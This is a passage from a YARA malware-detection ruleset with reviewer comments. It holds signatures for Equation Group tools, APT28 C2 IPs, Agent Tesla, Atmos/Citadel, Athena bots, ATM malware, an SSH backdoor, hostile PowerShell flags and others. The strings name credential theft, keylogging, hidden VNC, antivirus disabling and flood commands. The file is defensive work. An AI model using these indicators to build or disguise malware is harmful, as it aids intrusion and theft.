EXCEPTION_EXECUTE_HANDLER" fullword ascii $s8 = "Binding to RPC Interface %s over named pipe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_16 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii $x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii $s6 = "Sending Implant Payload (%d-bytes)" fullword ascii $s7 = "ERROR: Encoder failed on exploit payload" fullword ascii $s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii $s2 = "Target did not respond within specified amount of time" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-17 Identifier: Equation Group Tool Output Reference: Internal 
Research */ /* Rule Set ----------------------------------------------------------------- */ /* Matches the scanner's text output, not a binary, so there is deliberately no MZ check. */ rule EquationGroup_scanner_output { meta: description = "Detects output generated by EQGRP scanner.exe" author = "Florian Roth" reference = "Internal Research" date = "2017-04-17" strings: $s1 = "# Scan for windows boxes" ascii fullword $s2 = "Going into send" ascii fullword $s3 = "# Does not work" ascii fullword $s4 = "You are the weakest link, goodbye" ascii fullword $s5 = "rpc Scan for RPC folks" ascii fullword condition: filesize < 1000KB and 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* IP-literal IOCs from a 2016 report. Infrastructure rotates, so treat a hit as a lead to re-verify, not a conviction. fullword keeps e.g. "58.49.58.58" from matching inside a longer dotted quad. */ rule COZY_FANCY_BEAR_Hunt { meta: description = "Detects Cozy Bear / Fancy Bear C2 Server IPs" author = "Florian Roth" reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" date = "2016-06-14" strings: $s1 = "185.100.84.134" ascii wide fullword $s2 = "58.49.58.58" ascii wide fullword $s3 = "218.1.98.203" ascii wide fullword $s4 = "187.33.33.8" ascii wide fullword $s5 = "185.86.148.227" ascii wide fullword $s6 = "45.32.129.185" ascii wide fullword $s7 = "23.227.196.217" ascii wide fullword condition: uint16(0) == 0x5a4d and 1 of them } /* Filename-only indicator: any PE that merely references pagemgr.exe matches. */ rule COZY_FANCY_BEAR_pagemgr_Hunt { meta: description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report" author = "Florian Roth" reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" date = "2016-06-14" strings: $s1 = "pagemgr.exe" wide fullword condition: uint16(0) == 0x5a4d and 1 of them } /* " :3 " must be the first four bytes of the scanned data; nothing else is checked. */ rule APT_fancybear_Downdelph_magic : Bootkit{ meta: author = "Marc Salinas @Bondey_m" description = "APT28 downdelph magic string" reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download" strings: $str1 = " :3 " condition: $str1 at 0 } rule APT_fancybear_Downdelph_MBR : 
Bootkit{ meta: author = "Marc Salinas @Bondey_m" description = "APT28 downdelph string on MBR (get your MBR with BOOTICE on Win or #dd if=/dev/sda of=./sda.mbr bs=512 count=1" reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download" strings: $s1 = { 20 3A 33 20 } /* string " :3 " */ condition: $s1 at 411 /* offset 0x19b (411) inside the 512-byte sector; the sister rule Downdelph_magic checks offset 0 */ } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Furtim_nativeDLL { meta: description = "Detects Furtim malware - file native.dll" author = "Florian Roth" reference = "MISP 3971" date = "2016-06-13" hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948" strings: /* $op1/$op2 embed absolute addresses (a1 e0 79 44 00 = mov eax,[0x4479e0]; bf d0 25 44 00 = mov edi,0x4425d0) and are therefore build-specific. */ $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */ $op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 } /* Opcode */ $op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 } /* Opcode */ condition: /* NOTE(review): parses as (MZ and filesize and $s1) or (all of $op): the opcode branch is not gated by the PE/size checks. Furtim_Parent_1 below shows the parenthesised form; if that was intended here, write "uint16(0) == 0x5a4d and filesize < 900KB and ( $s1 or all of ($op*) )". Same precedence issue in msgkd_msslu64_msgki_mssld and EAFU_ecwi_ESKE_EVFR_RPC2_4. */ uint16(0) == 0x5a4d and filesize < 900KB and $s1 or all of ($op*) } /* Deliberate two-tier condition: gated by MZ/size when the RC4 password or the full string+opcode set is present, while the trailing "or all of them" lets every indicator together match non-PE data such as dumps. */ rule Furtim_Parent_1 { meta: description = "Detects Furtim Parent Malware" author = "Florian Roth" reference = "https://sentinelone.com/blogs/sfg-furtims-parent/" date = "2016-07-16" hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963" strings: /* RC4 encryption password */ $x1 = "dqrChZonUF" fullword ascii /* Other strings */ $s1 = "Egistec" fullword wide $s2 = "Copyright (C) 2016" fullword wide /* Op Code */ $op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 } $op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 } $op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 } condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ($s*) and all of ($op*) ) ) ) or all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* This Yara Rule is to be considered as "experimental" It represents a first attempt to detect BeEF hook function in memory It still requires further refinement */ /* experimental */ /* "all of them" over 18 strings: $s17 "mitb.sniff" is a prefix of $s9 "mitb.sniff(" and adds nothing, and any minified or trimmed hook.js variant that drops a single string evades the rule, hence "experimental". */ rule BeEF_browser_hooked { meta: description = "Yara rule related to hook.js, BeEF Browser hooking capability" author = "Pasquale Stirparo" date = "2015-10-07" hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db" strings: $s0 = "mitb.poisonAnchor" wide ascii $s1 = "this.request(this.httpproto" wide ascii $s2 = "beef.logger.get_dom_identifier" wide ascii $s3 = "return (!!window.opera" wide ascii $s4 = "history.pushState({ Be:\"EF\" }" wide ascii $s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" wide ascii $s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" wide ascii $s7 = "window.navigator.userAgent.match(/Avant TriCore/)" wide ascii $s8 = "window.navigator.userAgent.match(/Iceweasel" wide ascii $s9 = "mitb.sniff(" wide ascii $s10 = "Method XMLHttpRequest.open override" wide ascii $s11 = ".browser.hasWebSocket" wide ascii $s12 = ".mitb.poisonForm" wide ascii $s13 = "resolved=require.resolve(file,cwd||" wide ascii $s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" wide ascii $s15 = "beef.net.request" wide ascii $s16 = "uagent.search(engineOpera)" wide ascii $s17 = "mitb.sniff" wide ascii $s18 = "beef.logger.start" wide ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* NOTE(review): $s1 is the only string without nocase, so "PowerShell" or "POWERSHELL" never satisfies it; and no string is wide, so UTF-16 command lines (registry, event logs, process memory) are missed. Consider "$s1 = "powershell" nocase" and "ascii wide" on every string. $s9 is redundant: every "-encodedcommand" already contains "-enc". */ rule GEN_PowerShell { meta: description = "Generic PowerShell Malware Rule" author = "https://github.com/interleaved" strings: $s1 = "powershell" $s2 = "-ep bypass" nocase $s3 = "-nop" nocase $s10 = "-executionpolicy bypass" nocase $s4 = "-win hidden" nocase $s5 = "-windowstyle hidden" nocase $s11 = "-w hidden" nocase /*$s6 = "-noni" fullword ascii*/ /*$s7 = "-noninteractive" fullword ascii*/ $s8 = "-enc" nocase $s9 = "-encodedcommand" nocase condition: $s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* The PE check verifies the "PE\0\0" signature at e_lfanew (uint32(uint32(0x3C)) == 0x4550), stricter than the MZ-only checks used elsewhere in this file. */ rule Generic_ATMPot : Generic_ATMPot { meta: description = "Generic rule for Winpot aka ATMPot" author = "xylitol@temari.fr" date = "2019-02-24" reference = "https://securelist.com/atm-robber-winpot/89611/" /* May only the challenge guide you */ strings: $api1 = "CSCCNG" ascii wide $api2 = "CscCngOpen" ascii wide $api3 = "CscCngClose" ascii wide $string1 = "%d,%02d;" ascii wide /* 0xD: .text:004022EC FF 15 20 70 40 00 CALL DWORD PTR DS:[407020] ; cscwcng.CscCngDispense .text:004022F2 F6 C4 80 TEST AH,80 winpot: .text:004019D4 FF 15 24 60 40 00 CALL DWORD PTR DS:[406024] ; cscwcng.CscCngDispense .text:004019DA F6 C4 80 TEST AH,80 */ $hex1 = { FF 15 ?? ?? ?? ?? F6 C4 80 } /* 0xD...: 0040506E 25 31 5B 31 2D 34 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D: %1[1-4]VAL=%8[0-9] winpot: 0040404D 25 31 5B 30 2D 39 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D: %1[0-9]VAL=%8[0-9] */ $hex2 = { 25 31 5B ?? 2D ?? 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* Same PE-signature check as Generic_ATMPot. $hex_var1 is a call through an import (ff 15 [imm32]) followed by mov edi,0x8000 / test edi,eax. */ rule ATM_HelloWorld : malware { meta: description = "Search strings and procedure in HelloWorld ATM Malware" author = "xylitol@temari.fr" date = "2019-01-13" strings: $api1 = "CscCngOpen" ascii wide $api2 = "CscCngClose" ascii wide $string1 = "%d,%02d;" ascii wide $string2 = "MAX_NOTES" ascii wide $hex_var1 = { FF 15 ?? ?? ?? ?? BF 00 80 00 00 85 C7 } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* HTML report template of the stealer; "wide ascii" covers UTF-16 copies as well as ascii ones. 3 of 5, no PE check. */ rule Agenttesla { meta: description = "Detecting HTML strings used by Agent Tesla malware" author = "Stormshield" reference = "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/" version = "1.0" strings: $html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii $html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii $html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii $html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii $html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii condition: 3 of them } /* Form-field names of the exfil body, ascii-only, 6 of 11; filetype says "memory", so a wide variant of the strings would also catch any UTF-16 copies present in a dump. */ rule agenttesla_smtp_variant { meta: author = "J from THL <j@techhelplist.com> with thx to @Fumik0_ !!1!" 
date = "2018/2" reference1 = "https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection" reference2 = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a" reference3 = "Agent Tesla == negasteal -- @coldshell" version = 1 maltype = "Stealer" filetype = "memory" strings: $a = "type={" $b = "hwid={" $c = "time={" $d = "pcname={" $e = "logdata={" $f = "screen={" $g = "ipadd={" $h = "webcam_link={" $i = "screen_link={" $j = "site_username={" $k = "[passwords]" condition: 6 of them } /* NOTE(review): in YARA, ^ and $ anchor to the start and end of the whole scanned data, not to lines, so $s04 = /^Try Run$/ only matches data that is exactly "Try Run" and is effectively dead; "Try Run" wide fullword was probably intended, and "7 of them" then really means 7 of the remaining 8. $s06/$s09 carry the default .NET web-service namespace (tempuri.org), which appears in plenty of benign software. */ rule almashreq_agent_dotnet : almashreq_agent_dotnet { meta: description = "Memory rule for a .net RAT/Agent first found with .pdb referencing almashreq" author = "J from THL <j@techhelplist.com> with thx to @malwrhunterteam !!1!" date = "2019-05-12" reference1 = "https://twitter.com/JayTHL/status/1127334608142503936" reference2 = "https://www.virustotal.com/#/file/f6e1e425650abc6c0465758edf3c089a1dde5b9f58d26a50d3b8682cc38f12c8/details" reference3 = "https://www.virustotal.com/#/file/7e4231dc2bdab53f494b84bc13c6cb99478a6405405004c649478323ed5a9071/detection" reference4 = "https://www.virustotal.com/#/file/3cbaf6ddba3869ab68baf458afb25d2c8ba623153c43708bad2f312c4663161b/detection" reference5 = "https://www.virustotal.com/#/file/0f5424614b3519a340198dd82ad0abc9711a23c3283dc25b519affe5d2959a92/detection" maltype = "agent" filetype = "memory" strings: $s01 = "WriteElementString(@\"PCName\"," wide $s02 = "WriteElementString(@\"Command\"," wide $s03 = "WriteElementStringRaw(@\"commandID\"," wide $s04 = /^Try Run$/ wide $s05 = " is running in PC :" wide $s06 = "SOAPAction: \"http://tempuri.org/Set\"" wide $s07 = "Try Run</obj><name>" wide $s08 = "Disable</obj><name>" wide $s09 = "http://tempuri.org/" wide condition: 7 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* $s3 is a plain text string, not a YARA regex: it matches the literal characters 1[0-2])[0-9]. $s2 "POST" is generic; all three are required. */ rule alina { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-09" description = "Identify Alina" strings: $s1 = "Alina v1.0" $s2 = "POST" $s3 = "1[0-2])[0-9]" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* $config is a raw byte pattern; $c1 is an obfuscated registry-path fragment and must be kept verbatim. */ rule andromeda { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-03-13" description = "Identify Andromeda" strings: $config = {1c 1c 1d 03 49 47 46} $c1 = "hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst" condition: all of them } /* $a is a PE Rich header, not code: "69 E1 2A B0" is "DanS" XORed with the key "2D 80 44 E3", which then repeats three times as the format requires, followed by XORed tool-id/count pairs. That makes it a fingerprint of one build environment (same linker/toolchain session): unrelated binaries from the same builder can match, and a rebuild of the same malware will not. No PE check. */ rule Worm_Gamarue { meta: author = "Centro Criptológico Nacional (CCN)" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" description = "Gamarue_Andromeda" strings: $a = { 69 E1 2A B0 2D 80 44 E3 2D 80 44 E3 2D 80 44 E3 EE 8F 1B E3 2A 80 44 E3 EE 8F 19 E3 3A 80 44 E3 2D 80 45 E3 CD 81 44 E3 0A 46 39 E3 34 80 44 E3 0A 46 29 E3 A5 80 44 E3 0A 46 2A E3 5C 80 44 E3 0A 46 36 E3 2C 80 44 E3 0A 46 3C E3 2C 80 44 E3 } condition: $a } /* Event-log rule, not a PE rule: the provider name and event id 4688 (process creation) are generic fields, and "4688" matches those digits anywhere; only $data carries the actual indicator. */ rule andromeda_bot { meta: maltype = "Andromeda bot" author = "https://github.com/reed1713" description = "IOC looks for the creation or termination of a process associated with the Andromeda Trojan. The malware will execute the msiexec.exe within the suspicious directory. Shortly after, it creates and injects itself into the wuauctl.exe (windows update) process. It then attempts to beacon to its C2." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="AppData\\Local\\Temp\\_.net_\\msiexec.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ /* $s4 "\files\" and $s5 "SQLite" are generic on their own; all five strings are required. No PE check. */ rule Arkei : Arkei { meta: Author = "Fumik0_" Description = "Arkei Stealer" Date = "2018/07/10" Hash = "5632c89fe4c7c2c87b69d787bbf0a5b4cc535f1aa02699792888c60e0ef88fc5" strings: $s1 = "Arkei" wide ascii $s2 = "/server/gate" wide ascii $s3 = "/server/grubConfig" wide ascii $s4 = "\\files\\" wide ascii $s5 = "SQLite" wide ascii condition: all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Beacon field names split into separate short strings; all nine required. AthenaHTTP_v2 below matches the same beacon as two whole format strings. */ rule AthenaHTTP { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-09" description = "Identify Athena HTTP" strings: $s1 = "%s(%s)" $s2 = "type:on_exec" $s3 = "uid:%s" $s4 = "priv:%s" $s5 = "arch:x%s" $s6 = "gend:%s" $s7 = "cores:%i" $s8 = "ver:%s" $s9 = "net:%s" condition: all of them } /* Both beacon format strings plus 3 of 5 command names. */ rule AthenaHTTP_v2 { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Athena HTTP identification" source = "https://github.com/arbor/yara/blob/master/athena.yara" strings: $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|" $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|" $cmd1 = "filesearch.stop" $cmd2 = "rapidget" $cmd3 = "layer4." $cmd4 = "slowloris" $cmd5 = "rudy" condition: all of ($fmt_str*) and 3 of ($cmd*) } /* Two generations in one rule: the $cmd/$msg set is v2, the $amsg/$acmd set is v1 (see the condition). */ rule AthenaIRC { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Athena IRC v1.8.x, 2.x identification" source = "https://github.com/arbor/yara/blob/master/athena.yara" strings: $cmd1 = "ddos." fullword $cmd2 = "layer4." fullword $cmd3 = "war." 
fullword $cmd4 = "smartview" fullword $cmd5 = "ftp.upload" fullword $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped" $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]" $msg3 = "%s %s :%s FTP Upload: Failed" $msg4 = "Athena v2" $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]" // v1 strs $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable" $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds" $amsg3 = "Began flood: %i connections every %i ms to %s:%i" $amsg4 = "IPKiller>Athena" $amsg5 = "Athena=Shit!" $amsg6 = "Athena-v1" $amsg7 = "BTC wallet.dat file found" $amsg8 = "MineCraft lastlogin file found" $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot" $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" // Athena-v1.8.3 $amsg11 = "Rapid Connect/Disconnect" $amsg12 = "BTC wallet.dat found," // v1 cmds $acmd1 = ":!arme" $acmd2 = ":!openurl" $acmd3 = ":!condis" $acmd4 = ":!httpcombo" $acmd5 = ":!urlblock" $acmd6 = ":!udp" $acmd7 = ":!btcwallet" condition: (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
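*/

// Spyware.Citadel.Atmos, raw builder output. Keyed on the kutuzov license
// identifier plus either the TokenSpy HTTP header names or the hidden-VNC
// exports, in both cases together with the browser DLL/product names below.
rule Atmos_Malware {
    meta:
        description = "Generic Spyware.Citadel.Atmos Signature"
        author = "xylitol@temari.fr"
        reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
        date = "20/08/2016"
        // May only the challenge guide you
    strings:
        // kutuzov license identifier (the MZ header is tested in the condition)
        $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" wide ascii
        // TokenSpy identifiers
        $TS1 = "X-TS-Rule-Name: %s" wide ascii
        $TS2 = "X-TS-Rule-PatternID: %u" wide ascii
        $TS3 = "X-TS-BotID: %s" wide ascii
        $TS4 = "X-TS-Domain: %s" wide ascii
        $TS5 = "X-TS-SessionID: %s" wide ascii
        $TS6 = "X-TS-Header-Cookie: %S" wide ascii
        $TS7 = "X-TS-Header-Referer: %S" wide ascii
        $TS8 = "X-TS-Header-AcceptEncoding: %S" wide ascii
        $TS9 = "X-TS-Header-AcceptLanguage: %S" wide ascii
        $TS10 = "X-TS-Header-UserAgent: %S" wide ascii
        // Hidden VNC identifiers
        $VNC1 = "_hvnc_init@4" wide ascii
        $VNC2 = "_hvnc_uninit@0" wide ascii
        $VNC3 = "_hvnc_start@8" wide ascii
        $VNC4 = "_hvnc_stop@0" wide ascii
        $VNC5 = "_hvnc_wait@0" wide ascii
        $VNC6 = "_hvnc_work@0" wide ascii
        // Browsers identifiers
        $WB1 = "nspr4.dll" wide ascii
        $WB2 = "nss3.dll" wide ascii
        $WB3 = "chrome.dll" wide ascii
        $WB4 = "Internet Explorer" wide ascii
        $WB5 = "Firefox" wide ascii
        $WB6 = "Chrome" wide ascii
    condition:
        // uint16(0) == 0x5a4d is the same test as "$MZ at 0" with $MZ = {4D 5A}
        // (bytes 4D 5A at offset 0), written without a 2-byte atom that YARA
        // would otherwise have to search for across the whole file
        uint16(0) == 0x5a4d and $LKEY
        and (
            (5 of ($TS*) and all of ($WB*))
            or (3 of ($VNC*) and all of ($WB*))
        )
        // Standard size (raw from builder) should be around ~264kb
        // Remove the line below if you want to trigger also on memory dumps, etc...
        and filesize < 300KB
}

// Spyware.Citadel.Atmos, builder output with the extra packed layer. Keyed on
// code fragments rather than strings; "??" marks the bytes (pointers, sleep
// value) that vary between builds.
rule Atmos_Packed_Malware {
    meta:
        description = "Second Generic Spyware.Citadel.Atmos signature when builder add a packed layer"
        author = "xylitol@temari.fr"
        reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
        date = "20/08/2016"
        // May only the challenge guide you
    strings:
        // Kept as the author wrote it: "all of them" only needs 4D 5A to occur
        // somewhere in the file, not at offset 0, so this is not replaced by a
        // uint16(0) test (it is a 2-byte atom and will draw a slow-scan warning)
        $MZ = {4D 5A}
        // Entry point identifier with CreateThread pointer in '??'
        $a = {55 8B EC 83 EC 0C 53 56 8B 35 ?? ?? ?? 00 57 33 DB BF 00 28 00 00}
        // End of main proc with sleep value in '??' and api call to sleep in '??'
        $b = {68 ?? ?? ?? ?? FF 15 ?? ?? ?? 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3}
        // API String identifier (ShellExecuteExW, SHELL32.dll, GetUserNameExW, Secur32.dll)
        $c = {53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65}
        $d = {74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00}
        // New Thread identifier
        $e = {55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 ?? 6A FF FF 75 08 FF 15 ?? ?? ?? 00}
    condition:
        all of them
        // Standard size (raw from builder) should be around ~264kb
        // Remove the line below if you want to trigger also on memory dumps, etc...
        and filesize < 300KB
}

// Hacktool.Atmos.Builder (cracked): license key, the hardware ID the crack
// was issued for, and the builder's configuration-format strings.
rule Atmos_Builder {
    meta:
        description = "Generic signature for Hacktool.Atmos.Builder cracked version"
        author = "xylitol@temari.fr"
        reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
        date = "20/08/2016"
        // May only the challenge guide you
    strings:
        // kutuzov license identifier and good hardware ID (MZ is tested in the condition)
        $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" wide ascii
        $HWID = "D19FC0FB14BE23BCF35DA427951BB5AE" wide ascii
        // Builder strings identifiers
        $s1 = "url_loader=%S" wide ascii
        $s2 = "url_webinjects=%S" wide ascii
        $s3 = "url_tokenspy=%S" wide ascii
        $s4 = "file_webinjects=%S" wide ascii
        $s5 = "moneyparser.enabled=%u" wide ascii
        $s6 = "enable_luhn10_post=%u" wide ascii
        $s7 = "insidevm_enable=%u" wide ascii
        $s8 = "disable_antivirus=%u" wide ascii
    condition:
        // same as "$MZ at 0" with $MZ = {4D 5A}, without the 2-byte atom
        uint16(0) == 0x5a4d and $LKEY and $HWID and all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.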
*/

// Python/paramiko SSH backdoor script (server.py): source-level strings,
// so this only fires on the script itself, not on a compiled form.
rule custom_ssh_backdoor_server {
    meta:
        description = "Custome SSH backdoor based on python and paramiko - file server.py"
        author = "Florian Roth"
        reference = "https://goo.gl/S46L3o"
        date = "2015-05-14"
        hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
    strings:
        $s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
        $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
        $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
        $s3 = "chan.send(command)" fullword ascii
        $s4 = "print '[-] SSH negotiation failed.'" fullword ascii
        $s5 = "except paramiko.SSHException, x:" fullword ascii
    condition:
        // small script; five of the six lines must be present
        filesize < 10KB and 5 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// Backoff point-of-sale malware: its C2 request format plus a keylog string.
rule backoff {
    meta:
        author = "Brian Wallace @botnet_hunter"
        author_email = "bwall@ballastsecurity.net"
        date = "2014-08-21"
        description = "Identify Backoff"
    strings:
        $s1 = "&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s"
        $s2 = "%s @ %s"
        $s3 = "Upload KeyLogs"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

// Bangat: one anonymous code pattern (the decrement/push/call sequence below).
rule BangatCode {
    meta:
        description = "Bangat code features"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    strings:
        // dec [ebp + procname], push eax, push edx, call get procaddress
        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
    condition:
        any of them
}

// Bangat: the $lib strings are Win32 API names with the first letter changed
// (e.g. "DreatePipe"), which is how the sample stores them; the temp file
// name and the "~_MC_3~" marker each match on their own.
rule BangatStrings {
    meta:
        description = "Bangat Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    strings:
        $lib1 = "DreatePipe"
        $lib2 = "HetSystemDirectoryA"
        $lib3 = "SeleaseMutex"
        $lib4 = "DloseWindowStation"
        $lib5 = "DontrolService"
        $file = "~hhC2F~.tmp"
        $mc = "~_MC_3~"
    condition:
        all of ($lib*) or $file or $mc
}

// Umbrella rule: either the code or the string signature (both defined above,
// so this rule must stay after them).
rule Bangat {
    meta:
        description = "Bangat"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    condition:
        BangatCode or BangatStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license. */

import "pe"

// Batel backdoor: no byte patterns, only the PE export/import table (the
// "run_shell" export plus the CRT/debugger-related imports). pe.exports and
